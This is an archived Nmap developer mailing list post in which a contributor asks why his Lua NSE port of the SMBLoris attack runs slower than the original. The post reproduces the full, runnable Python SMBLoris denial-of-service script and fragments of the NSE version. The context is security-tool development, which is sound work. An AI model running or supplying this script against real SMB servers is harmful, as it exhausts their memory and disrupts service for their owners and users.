Nmap Development mailing list archives
NSE-nsock issues?
From: Wong Wai Tuck <wongwaituck () gmail com>
Date: Thu, 24 Aug 2017 15:40:39 +0000
Hey list I currently facing a problem Was hoping someone could clarify this odd behaviour. I was implementing the smb-smbloris script and I faced this odd issue which did not occur in the Python implementation of smbloris and was wondering if anyone could provide any insights as to why this is happening. Here is the original smbloris in Python (written by zerosum0x0): import sys import socket import resource rhost = sys.argv[1] rport = sys.argv[2] resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000)) sks = {} while True: for lport in range(1, 65536): try: if lport in sks: sks[lport].close() sk = socket.socket() sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sk.bind(('0.0.0.0', lport)) sk.connect((rhost, int(rport))) sk.send('\x00\x01\xff\xff') sks[lport] = sk except Exception as e: print("%s - Port: %d" % (str(e), lport)) The script executes well. However, the Lua implementation that I have made for NSE performs poorly: local function send_dos(host, port, src_port) if host_down then return end local oldsocket = skts[src_port] if oldsocket then oldsocket:close() end local socket = nmap.new_socket() local try = nmap.new_try() stdnse.debug1("Trying to send from %s", src_port) try(socket:bind("0.0.0.0", src_port)) local status, err = socket:connect(host, port) socket:send(SMBLORIS_PAYLOAD) if status then if not oldsocket then table.insert(skts, socket) else skts[src_port] = socket end end -- the action function while not timed_out or not host_down do -- using 65000 instead of 65535 prevents crash of too many files open for i=1, 65000, 1 do send_dos(host, port, i) if i % 1000 == 0 and i <= 60000 then -- prevents crash when i >= 61000 check_alive(host, mean, ci) end -- has it timed out yet? if nmap.clock() - timeout >= script_start then stdnse.debug1("Script timed out at %s", timeout) break end end end You can find the full script in the PR here [2]. Even after commenting out the differences for the following lines in the Python implementation: resource.setrlimit(resource.RLIMIT_NOFILE, (70000, 70000)) sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) sk.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) The Python implementation still outperforms the NSE implementation, even if the code is nearly identical. The results can be found here [1]. I have tried playing with the timeouts, using OS given sockets instead of assigning my own, using threads (which ironically made it perform even worse), and I can't seem to get it to work better. Additionally, I am not sure if this is the cause I noticed that as more connections are made, the speed at which the connections are made are much slower in NSE than the Python implementation. I am not exactly sure what is the cause, but if someone could point me in the right direction that would be helpful! I have tried to adjust the min-rate argument, as well as the max-parallelism argument (which is apparently used nsock NSE file from what I read from the source), both of which did not have the effect I was hoping for. [1]: http://imgur.com/a/AAdG3 [2]: https://github.com/nmap/nmap/pull/983 Wai Tuck
_______________________________________________ Sent through the dev mailing list https://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
Current thread:
- NSE-nsock issues? Wong Wai Tuck (Aug 24)